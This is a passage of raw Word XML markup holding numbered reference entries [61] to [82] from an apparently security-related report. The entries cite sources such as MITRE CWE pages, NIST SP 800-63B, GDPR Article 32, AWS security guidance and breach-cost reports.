      </w:r>
      <w:r w:rsidR="00230D71" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Prevention," June 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00372D62" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[61]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gartner. "Innovation Insight: Cloud Security P</w:t>
      </w:r>
      <w:r w:rsidR="00230D71" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">osture Management," July 2024. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00372D62" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[62]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft Security. "Your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Pa$word</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> doesn't matter," Microsoft Security Blog, Nov 2019. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00372D62" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[63]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>BeyondTrust</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. "2024 Pri</w:t>
      </w:r>
      <w:r w:rsidR="00131663" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">vileged Access Threat Report." </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00372D62" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[64]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Forrester Research. "The Business Value of Zero Trust Architecture," commissioned by </w:t>
      </w:r>
      <w:r w:rsidR="00131663" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00131663" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Illumio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00131663" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>, 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00372D62" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[65]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE. "CWE-306: Missing Authentication for Critical Function." </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="007F7CF8" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="007F7CF8" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A5377" w:rsidRPr="00C57BFC" w:rsidRDefault="00807452" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[66]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> FIDO Alliance. "FIDO2: Moving the World Beyond Passwords." </w:t>
      </w:r>
      <w:r w:rsidR="009A5377" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:hyperlink r:id="rId76" w:history="1">
        <w:r w:rsidR="009A5377" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://fidoalliance.org/fido2/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00807452" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[67]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> NIST. "SP 800-63B: Digital Identity Guidelines - Authenticat</w:t>
      </w:r>
      <w:r w:rsidR="009A5377" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">ion and Lifecycle </w:t>
      </w:r>
      <w:r w:rsidR="009A5377" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Management," June 2017. </w:t>
      </w:r>
      <w:hyperlink r:id="rId77" w:history="1">
        <w:r w:rsidR="009A5377" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://pages.nist.gov/800-63-3/sp800-63b.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00807452" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[68]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE. "CWE-693: </w:t>
      </w:r>
      <w:r w:rsidR="00310B97" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Protection Mechanism Failure." </w:t>
      </w:r>
      <w:r w:rsidR="00310B97" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:hyperlink r:id="rId78" w:history="1">
        <w:r w:rsidR="006F179A" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cwe.mitre.org/data/definitions/693.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00807452" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[69]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gartner. "Market Guide for Endpoint Detection </w:t>
      </w:r>
      <w:r w:rsidR="006F179A" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">and Response Solutions," 2024. </w:t>
      </w:r>
      <w:r w:rsidR="006F179A" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:hyperlink r:id="rId79" w:history="1">
        <w:r w:rsidR="006F179A" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.gartner.com/en/documents/endpoint-detection-response</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00807452" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[70]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> ESG Research. "2024 Cybersecurity Spending Trends." Enterprise Strategy Group, 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00807452" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[71]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE. "CWE-359: Exposure of Private Personal Information to an Unauthorized Actor." </w:t>
      </w:r>
      <w:r w:rsidR="006F179A" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:hyperlink r:id="rId80" w:history="1">
        <w:r w:rsidR="006F179A" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cwe.mitre.org/data/definitions/359.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006F179A" w:rsidRPr="00C57BFC" w:rsidRDefault="00807452" w:rsidP="006F179A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[72]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> European Union. "General Data Protection Regulation (GDPR) Article 32: Security of </w:t>
      </w:r>
      <w:r w:rsidR="006F179A" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">       Processing." https://gdpr-info.eu/art-32-gdpr/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00807452" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[73]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE. "CWE-732: Incorrect Permission Assignment for Critical Resource." </w:t>
      </w:r>
      <w:r w:rsidR="0097230E" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:hyperlink r:id="rId81" w:history="1">
        <w:r w:rsidR="0097230E" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cwe.mitre.org/data/definitions/732.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0097230E" w:rsidRPr="00C57BFC" w:rsidRDefault="00807452" w:rsidP="0097230E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[74]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Information Commissioner's Office (ICO). "Guide to t</w:t>
      </w:r>
      <w:r w:rsidR="0097230E" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">he GDPR: Fines and Penalties." </w:t>
      </w:r>
      <w:r w:rsidR="0097230E" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        https://ico.org.uk/for-organisations/guide-to-data-protection/guide-to-the-general-data-</w:t>
      </w:r>
      <w:r w:rsidR="0097230E" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        protection-regulation-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0097230E" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>gdpr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0097230E" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00807452" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[75]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Amazon Web Services. "AWS Security Best Practices for S3." </w:t>
      </w:r>
      <w:r w:rsidR="008301E8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00807452" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[76]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE. "CWE-798: U</w:t>
      </w:r>
      <w:r w:rsidR="008301E8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">se of Hard-coded Credentials." </w:t>
      </w:r>
      <w:r w:rsidR="008301E8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:hyperlink r:id="rId82" w:history="1">
        <w:r w:rsidR="008301E8" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cwe.mitre.org/data/definitions/798.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00807452" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[77]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Amazon Web Services. "AWS Secrets Manager: Rotate, manage, and retrieve secrets." </w:t>
      </w:r>
      <w:r w:rsidR="00CD1235" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:hyperlink r:id="rId83" w:history="1">
        <w:r w:rsidR="00F5638C" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://aws.amazon.com/secrets-manager/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F5638C" w:rsidRPr="00C57BFC" w:rsidRDefault="00807452" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[78]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE. "CWE-778: Insufficient Logging." </w:t>
      </w:r>
      <w:hyperlink r:id="rId84" w:history="1">
        <w:r w:rsidR="00F5638C" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cwe.mitre.org/data/definitions/778.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00807452" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[79]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> UnitedHealth Group. "Q3 2024 Earnings Report: Cha</w:t>
      </w:r>
      <w:r w:rsidR="00F5638C" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">nge Healthcare Breach Impact." </w:t>
      </w:r>
      <w:r w:rsidR="00F5638C" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        https://www.unitedhealthgroup.com/newsroom/2024/change-healthcare-cyberattack.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00807452" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[80]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> U.S. Securities and Exchange Commission. "Merck &amp; Co., Inc. Form 10-K Annual Report </w:t>
      </w:r>
      <w:r w:rsidR="00CD6275" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">       2017," pp. 22-23.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="007F7CF8" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="007F7CF8" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00807452" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[81]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> IBM Security and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Ponemon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Institute. "Cost of a Data Breach Report 2024." </w:t>
      </w:r>
      <w:r w:rsidR="00AA0D6C" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:hyperlink r:id="rId85" w:history="1">
        <w:r w:rsidR="00AA0D6C" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.ibm.com/reports/data-breach</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="004139A8" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[82]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> KnowBe4. "2024 Phishing by </w:t>
      </w:r>
      <w:r w:rsidR="00AA0D6C" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Industry Benchmarking Report." </w:t>
      </w:r>
      <w:r w:rsidR="00AA0D6C" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
